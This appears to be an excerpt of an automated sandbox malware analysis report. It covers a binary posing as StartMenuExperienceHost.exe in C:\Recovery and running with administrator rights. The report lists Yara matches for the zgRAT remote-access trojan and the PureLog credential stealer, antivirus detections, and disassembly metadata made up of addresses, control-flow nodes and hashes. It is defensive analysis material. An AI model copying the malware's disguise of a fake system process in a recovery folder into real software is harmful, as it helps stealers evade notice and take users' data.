                                                        Commandline:C:\Recovery\StartMenuExperienceHost.exe
                                                        Imagebase:0xc80000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\StartMenuExperienceHost.exe, Author: Joe Security
                                                        Antivirus matches:
                                                        • Detection: 100%, Avira
                                                        • Detection: 100%, Joe Sandbox ML
                                                        • Detection: 66%, ReversingLabs
                                                        Has exited:true

                                                        General

                                                        Target ID:30
                                                        Start time:00:22:02
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Recovery\StartMenuExperienceHost.exe
                                                        Imagebase:0xb70000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        General

                                                        Target ID:31
                                                        Start time:00:22:10
                                                        Start date:30/10/2024
                                                        Path:C:\Recovery\StartMenuExperienceHost.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Recovery\StartMenuExperienceHost.exe"
                                                        Imagebase:0x860000
                                                        File size:1'688'064 bytes
                                                        MD5 hash:844679E76D8254BEDD67C98610F7D7AC
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Has exited:true

                                                        Disassembly

                                                        Reset < >

                                                          Execution Graph

                                                          Execution Coverage:2.5%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:3
                                                          Total number of Limit Nodes:0
                                                          execution_graph 11586 7ffd9bb11cd1 11589 7ffd9bb11cef QueryFullProcessImageNameA 11586->11589 11588 7ffd9bb11e94 11589->11588

                                                          Executed Functions

                                                          Function 00007FFD9B770D47 Relevance: 1.5, Strings: 1, Instructions: 263COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 5Z_H
                                                          • API String ID: 0-3267294416
                                                          • Opcode ID: 2d775ea22a9bdce30337f20ef2ecfd64fc746995d74d8bde5fa57b952dae6c0c
                                                          • Instruction ID: 0192c112913836a8f254906218b8a48a1be9abfc9c5dc4733e6ec677e9cbb820
                                                          • Opcode Fuzzy Hash: 2d775ea22a9bdce30337f20ef2ecfd64fc746995d74d8bde5fa57b952dae6c0c
                                                          • Instruction Fuzzy Hash: 6791D6B5A19A9D4FEB55DF688869BA87FE1FF55704F0001BED049D72E2EAB82410C740
                                                          Function 00007FFD9BB1AC12 Relevance: .5, Instructions: 460COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 99 7ffd9bb1ac12-7ffd9bb1ac1f 100 7ffd9bb1ac21-7ffd9bb1ac29 99->100 101 7ffd9bb1ac2a-7ffd9bb1acf7 99->101 100->101 104 7ffd9bb1ad63 101->104 105 7ffd9bb1acf9-7ffd9bb1ad02 101->105 107 7ffd9bb1ad65-7ffd9bb1ad8a 104->107 105->104 106 7ffd9bb1ad04-7ffd9bb1ad10 105->106 108 7ffd9bb1ad12-7ffd9bb1ad24 106->108 109 7ffd9bb1ad49-7ffd9bb1ad61 106->109 113 7ffd9bb1adf6 107->113 114 7ffd9bb1ad8c-7ffd9bb1ad95 107->114 110 7ffd9bb1ad26 108->110 111 7ffd9bb1ad28-7ffd9bb1ad3b 108->111 109->107 110->111 111->111 115 7ffd9bb1ad3d-7ffd9bb1ad45 111->115 117 7ffd9bb1adf8-7ffd9bb1ae1d 113->117 114->113 116 7ffd9bb1ad97-7ffd9bb1ada3 114->116 115->109 118 7ffd9bb1ada5-7ffd9bb1adb7 116->118 119 7ffd9bb1addc-7ffd9bb1adf4 116->119 124 7ffd9bb1ae1f-7ffd9bb1ae29 117->124 125 7ffd9bb1ae8b 117->125 120 7ffd9bb1adb9 118->120 121 7ffd9bb1adbb-7ffd9bb1adce 118->121 119->117 120->121 121->121 123 7ffd9bb1add0-7ffd9bb1add8 121->123 123->119 124->125 127 7ffd9bb1ae2b-7ffd9bb1ae38 124->127 126 7ffd9bb1ae8d-7ffd9bb1aebb 125->126 134 7ffd9bb1aebd-7ffd9bb1aec8 126->134 135 7ffd9bb1af2b 126->135 128 7ffd9bb1ae71-7ffd9bb1ae89 127->128 129 7ffd9bb1ae3a-7ffd9bb1ae4c 127->129 128->126 131 7ffd9bb1ae4e 129->131 132 7ffd9bb1ae50-7ffd9bb1ae63 129->132 131->132 132->132 133 7ffd9bb1ae65-7ffd9bb1ae6d 132->133 133->128 134->135 136 7ffd9bb1aeca-7ffd9bb1aed8 134->136 137 7ffd9bb1af2d-7ffd9bb1b005 135->137 138 7ffd9bb1af11-7ffd9bb1af29 136->138 139 7ffd9bb1aeda-7ffd9bb1aeec 136->139 147 7ffd9bb1b00b-7ffd9bb1b01a 137->147 138->137 141 7ffd9bb1aeee 139->141 142 7ffd9bb1aef0-7ffd9bb1af03 139->142 141->142 142->142 144 7ffd9bb1af05-7ffd9bb1af0d 142->144 144->138 148 7ffd9bb1b022-7ffd9bb1b084 call 7ffd9bb1b0a0 147->148 149 7ffd9bb1b01c 147->149 156 7ffd9bb1b086 148->156 157 7ffd9bb1b08b-7ffd9bb1b09f 148->157 149->148 156->157
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1719957584.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bb10000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4e0562036a64dc4cb373629cc5b941ff05cfd30b6af9eed870f744e12917ef2d
                                                          • Instruction ID: b85dd7ef1e582db18228952249f01cdf3b7797682c75591e80d384b25353af9a
                                                          • Opcode Fuzzy Hash: 4e0562036a64dc4cb373629cc5b941ff05cfd30b6af9eed870f744e12917ef2d
                                                          • Instruction Fuzzy Hash: D7E1E430A09A4D8FEBA8DF28C8657F937D1FF54310F14426AE85DC72D5DE74A9418B81
                                                          Function 00007FFD9BB11CD1 Relevance: 1.8, APIs: 1, Instructions: 258COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1719957584.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bb10000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID: FullImageNameProcessQuery
                                                          • String ID:
                                                          • API String ID: 3578328331-0
                                                          • Opcode ID: f06d41302da8164f8bf6f68e0b2f89bc4a29595586eb73367121f7c8425ffb0b
                                                          • Instruction ID: 77027d75373a1e5dfe95522c163b306c775e07ce1ed005cdbc9b1efab97a8713
                                                          • Opcode Fuzzy Hash: f06d41302da8164f8bf6f68e0b2f89bc4a29595586eb73367121f7c8425ffb0b
                                                          • Instruction Fuzzy Hash: 37719230608A8D8FDB68DF68C8557F937E1FB59315F00427EE84EC7292CB7599468B81
                                                          Function 00007FFD9B770998 Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dbf1a568c72ed6495413b7bdfc3c6c4a49da5b2459044ea5c5ded33d3732f7da
                                                          • Instruction ID: 40e9ce1794bcc4f1886e7440b08409ff80435cc2b0a7989289a6db3167ed0689
                                                          • Opcode Fuzzy Hash: dbf1a568c72ed6495413b7bdfc3c6c4a49da5b2459044ea5c5ded33d3732f7da
                                                          • Instruction Fuzzy Hash: F4310820B19A5D0FE798FB6C94BAA7833C2EB99315B4101B9E40DC33F6DD28EC418345
                                                          Function 00007FFD9B770908 Relevance: .1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction ID: e6c8b523e4bbb407a6bca34ae7c78c926a5b7a94366618befe5ad6171f87d8e9
                                                          • Opcode Fuzzy Hash: dfa560b8674232b036245963f28da186a8f4c138d6b1b6fd382aa6a4ebc34706
                                                          • Instruction Fuzzy Hash: AD21073130DD184FE768EA4CE88ADB973D5EF9932130101BAE58EC7136E951EC8287C1
                                                          Function 00007FFD9B77116D Relevance: .1, Instructions: 87COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7be69325a76a4311cc36e16e8d48265934867fa09caf99c64f2c7de3ba791a2a
                                                          • Instruction ID: 3eb4f8466ea1e5bd15d199e119012cab31bab069c11e16e21c5044a7c8f567df
                                                          • Opcode Fuzzy Hash: 7be69325a76a4311cc36e16e8d48265934867fa09caf99c64f2c7de3ba791a2a
                                                          • Instruction Fuzzy Hash: 13316430A1964D8FDB45EBA4C8A59B977F0FF59300F0546BAD409DB1B2DA78A540CB50
                                                          Function 00007FFD9B770C25 Relevance: .1, Instructions: 78COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1a8c8d8558eec90eb7f2c55ec09536bdf26829eaf691ed7c22024589f576258
                                                          • Instruction ID: 46a27edf65885a1543b8d69dff7cdeeda3c7bd249ab7b54d8b59edd2ca13f398
                                                          • Opcode Fuzzy Hash: f1a8c8d8558eec90eb7f2c55ec09536bdf26829eaf691ed7c22024589f576258
                                                          • Instruction Fuzzy Hash: 4321A575A0D78D8FEB21DBA888A92EC7FA0EF52314F1646BBD044CB1E2D97826458741
                                                          Function 00007FFD9B774C28 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction ID: 580de899b3560bcb4d6dcb0b1066e6f3969de108e41c19e92ddba1c0cd3961c2
                                                          • Opcode Fuzzy Hash: 76da49c2aa001fdcb0aaa8d6f4a2044e05ac30993e78f7bd20c47889fdd9d1cc
                                                          • Instruction Fuzzy Hash: 83215E21B1961E4FEBB4E75888B96BC7392FF85310F1602B9E44ED72F2DE686E414740
                                                          Function 00007FFD9B772BF9 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 215b263e9314451e95af81039b218bec06bd863f7e3850854d86c5855ffc9d1e
                                                          • Instruction ID: 14bc32014f02d64b71fc6993ec9e4c2c9fcfa88f8881f8458458a9249c3526db
                                                          • Opcode Fuzzy Hash: 215b263e9314451e95af81039b218bec06bd863f7e3850854d86c5855ffc9d1e
                                                          • Instruction Fuzzy Hash: F9115730A19A0D8FDB54DF48C494BA973E1FB69304F1142A9D04ED32B5DA78AA808B45
                                                          Function 00007FFD9B774D1E Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction ID: 09f0ff9b15e4b03062e7ceaec1572c5066ce170f4539b37138cfa917da02ec6b
                                                          • Opcode Fuzzy Hash: d79fdf0a7b5e6cff03ce654eadb70af180b103078c32ae522b5c1918063004eb
                                                          • Instruction Fuzzy Hash: 4A110321B0960D4BEFA4E66884E9ABC73D2EF94740F1605BDD54EC72F2DD786A418604
                                                          Function 00007FFD9B770C38 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction ID: c8df8ecfbcff56499c6b97853aa873acc4ffdb6f1501b033612ed46d14a9e47d
                                                          • Opcode Fuzzy Hash: e19204ac95bd02888abdea4ea6a6191eb78db131177b2ac76db2b69c5368b821
                                                          • Instruction Fuzzy Hash: CF117035A0D78D8FEB12DBA898A92DCBFA0EF52214F1646B7C084DB1E2E57416498781
                                                          Function 00007FFD9B770C40 Relevance: .0, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction ID: 3f2f2090d8da6a43d7965b5c4eba903661569b89c21e4bc6bec3c5e4b9ab60da
                                                          • Opcode Fuzzy Hash: 56f46b79cf64b9e6aef23dadac72c4ce997f4aa46cd70d3c1cad83f03af645b0
                                                          • Instruction Fuzzy Hash: 3E01A135A0D7888FEB12DB6888A41DCBFB0EF42314F0646F7C084DB1E2D57416488780
                                                          Function 00007FFD9B774CE3 Relevance: .0, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction ID: d0d5c5319233750a9222b99b807a0cf5343c0adfe0f6c11f1a1e700c5e5f32cb
                                                          • Opcode Fuzzy Hash: 5554ce8cfa5bda4a09edcef3f4ce8531ce752d1f95435721850e8c5bd83630bd
                                                          • Instruction Fuzzy Hash: 87F03130B1951E8EEB64EA54D8E9AFC73A1FF54311F1602FDD10ED32B2DD786A818A04
                                                          Function 00007FFD9B770C50 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction ID: bc7429274e4d1f7fc1d46d0c93eb6e78eaa8e5b774edbf18953fa296aae15a2f
                                                          • Opcode Fuzzy Hash: 26eefe597a17be193e35cf7a9f013773529d44204a5abc2d6f5942d680988026
                                                          • Instruction Fuzzy Hash: 59018434A0D3898FEB12DB6484941DDBFF0EF02314F1542E7C444CB1A2D9745B44C741
                                                          Function 00007FFD9B77560A Relevance: .0, Instructions: 27COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction ID: 8272ee44d0b82c16a65333f4ad0edade07e14b0f4f67f034a193085c366d0064
                                                          • Opcode Fuzzy Hash: ec35e2213699fc7d56f5bcb80efc954be6a810b370defc750019ec56b6c61d1e
                                                          • Instruction Fuzzy Hash: 0EF08930A0920647F7509684C4A17E9B394EF84310F124279E90E977E2DD7C6E85CB45
                                                          Function 00007FFD9B7706AD Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction ID: 31e668ce6111303d3c648c45381bfc4cd6f488d9990d3e3ae62346c21e55579d
                                                          • Opcode Fuzzy Hash: 5c1f25e0a95c736867b72634e4be5268a9db08ac9155d032615a6b6308ac3b74
                                                          • Instruction Fuzzy Hash: 99C00205F5B75F01E86571AA58B60AEB140DBC4A25F921273D50D821B1988E22D54196
                                                          Function 00007FFD9B7712D8 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction ID: 014d798b6d36322f39b9c860b9ef3808481d02ed10de65713d785253ca219bc5
                                                          • Opcode Fuzzy Hash: fe1f07bad560b021fc5606da94808cc80d9bb50aaf5c47c17121d2f162821e36
                                                          • Instruction Fuzzy Hash: 15C08C3051190E8FC908EB28C88480433A0FB19200BC200D0E009C7170E259DCC2C740
                                                          Function 00007FFD9B771CF0 Relevance: .0, Instructions: 10COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9c1f5fcd89b22ab4e6cb088b3e2574c7a0c9901863983566b36ce84dac8edf68
                                                          • Instruction ID: fa5520f1a304975ab2e2278b166fa66351b66a601fa2efc91c981dee1e82d7f2
                                                          • Opcode Fuzzy Hash: 9c1f5fcd89b22ab4e6cb088b3e2574c7a0c9901863983566b36ce84dac8edf68
                                                          • Instruction Fuzzy Hash: 2FC08C00F18C5E8AF326B644043167D0402AB80B08F804274E00FC7BCECC0C2E02028B
                                                          Function 00007FFD9B7706D0 Relevance: .0, Instructions: 8COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction ID: 036e8af56f23f0f284f01f510b383e4077dfe8aa50ea0e621eed4e322330a2b4
                                                          • Opcode Fuzzy Hash: 8a38f57ed639fef3d88d11df78701187595349350ded237a282492a867519792
                                                          • Instruction Fuzzy Hash: 6AB01200E5750F00E82431FA0CE20A5B040DB44110FC20271D40C411F198CD12D40282
                                                          Function 00007FFD9B772279 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction ID: aa4335d639f11fad10cfd9083291069f188472a50696d56f4d975dc6008051bc
                                                          • Opcode Fuzzy Hash: a356a445c7444da277418655de0d64a20d14b7fd259fe8e1dcec3ab04cc465c1
                                                          • Instruction Fuzzy Hash: F1B09222E1A35D42F72492A084A12FA71529F44710F5AC6B2900FA74E18C682B899681

                                                          Non-executed Functions

                                                          Function 00007FFD9B8D370F Relevance: 88.5, Strings: 60, Instructions: 13525COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1717341099.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b8d0000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$$tX*$$tX*$$tX*$$tX*$$tX*$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$ZcW$ZcW$ZcW$ZcW$ZcW$ZcW$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$arij$arij$arij$arij$arij$arij$arij$arij$u~(<$u~(<$u~(<$z^a$z^a$z^a$z^a$z^a$z^a$z^a$z^a$xg$xg$xg$xg$xg$d)$d)$d)$d)$d)$d)$d)$d)
                                                          • API String ID: 0-799221730
                                                          • Opcode ID: f2fdfcc84d67d7c33c2faefa3c26d25d826dbd7bc08796803c79be2444b3d304
                                                          • Instruction ID: e851a523e64263331ae07446205e47040d750101e736eae8df6e2db828d5909f
                                                          • Opcode Fuzzy Hash: f2fdfcc84d67d7c33c2faefa3c26d25d826dbd7bc08796803c79be2444b3d304
                                                          • Instruction Fuzzy Hash: 72544174A145198FD758EB68C8A5AB9B7E2FF98300F5141F9D40EE7392DE34AA81CF01
                                                          Function 00007FFD9B8D374C Relevance: 88.5, Strings: 60, Instructions: 13500COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1717341099.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b8d0000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: !$$tX*$$tX*$$tX*$$tX*$$tX*$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$'Ql$ZcW$ZcW$ZcW$ZcW$ZcW$ZcW$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$`+0$arij$arij$arij$arij$arij$arij$arij$arij$u~(<$u~(<$u~(<$z^a$z^a$z^a$z^a$z^a$z^a$z^a$z^a$xg$xg$xg$xg$xg$d)$d)$d)$d)$d)$d)$d)$d)
                                                          • API String ID: 0-799221730
                                                          • Opcode ID: 38b8f34f52dc46d04f59bd23e4ba9c8a4eda81347ad58d8880ae4e7262d0c17b
                                                          • Instruction ID: 72ec1491152548c4759a68da15599a0fb7feda1732959dbc4e19617863dea893
                                                          • Opcode Fuzzy Hash: 38b8f34f52dc46d04f59bd23e4ba9c8a4eda81347ad58d8880ae4e7262d0c17b
                                                          • Instruction Fuzzy Hash: 32544174A145198FD758EB68C8A5AB9B7E2FF98300F5141F9D40EE7392DE34AA81CF01
                                                          Function 00007FFD9BB19E66 Relevance: .5, Instructions: 474COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1719957584.00007FFD9BB10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB10000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9bb10000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6793ef728a6eb5af5de62f15bdf99abaff7a91b44d9025ffaf99a77205f6eece
                                                          • Instruction ID: 5ed0e864eb6647c3258fdcae8bf8acccd12eadb601e8672e6cc5787e6ab84e0f
                                                          • Opcode Fuzzy Hash: 6793ef728a6eb5af5de62f15bdf99abaff7a91b44d9025ffaf99a77205f6eece
                                                          • Instruction Fuzzy Hash: 68F1C630A09A8D8FEBA8DF28C8557E937E1FF55310F04426EE85DC72D5DB34A9458B82
                                                          Function 00007FFD9B770E43 Relevance: .2, Instructions: 174COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1716023327.00007FFD9B770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B770000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ffd9b770000_0JLWNg4Sz1.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 920d4aeae8e41c0744060413ee46885ce784d249080e39ef9551939095218a0a
                                                          • Instruction ID: 2131387b21bfd277a136900a21b7093bbec8dbb55a858b4a451edd6540191628
                                                          • Opcode Fuzzy Hash: 920d4aeae8e41c0744060413ee46885ce784d249080e39ef9551939095218a0a
                                                          • Instruction Fuzzy Hash: 3B51D5B5A29A5D8FE798DF9C88A9BA87FD0FB55718F4001BED009D33E5DAB81410C740
